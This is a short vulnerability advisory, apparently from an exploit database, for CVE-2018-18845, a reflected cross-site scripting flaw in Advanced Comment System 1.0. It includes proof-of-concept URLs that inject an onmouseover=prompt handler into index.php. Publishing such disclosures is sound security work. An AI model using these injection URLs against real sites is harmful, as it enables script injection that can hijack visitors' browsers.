Advanced Comment System 1.0 Cross Site Scripting

`<!--  
# Exploit Title: Cross Site Scripting in Advanced comment system v1.0  
# Date: 29-10-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.plohni.com  
# Software Link:  
http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip,  
https://web.archive.org/web/20120214173003/http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip  
# Version: Advanced comment system v1.0  
# Tested on: All  
# CVE : CVE-2018-18845  
# Category: webapps  
  
1. Description  
  
Advanced Comment System, version 1.0, the page  
internal/advanced_comment_system/index.php contains a reflected cross-site  
scripting vulnerability. A remote unauthenticated attacker could  
potentially exploit this vulnerability to supply malicious HTML or  
JavaScript code to a vulnerable web application, which is then reflected  
back to the victim and executed by the web browser. The product is  
discontinued.  
  
  
2. Proof of Concept  
  
http://localhost/advanced_comment_system/index.php/ACS_path=/%F6%22%20onmouseover=prompt%28998163%29%20//  
or  
http://localhost/advanced_comment_system/index.php/%F6%22%20onmouseover=prompt%28998163%29%20//  
  
3. Solution:  
  
The product is discontinued.  
  
-->  
  
`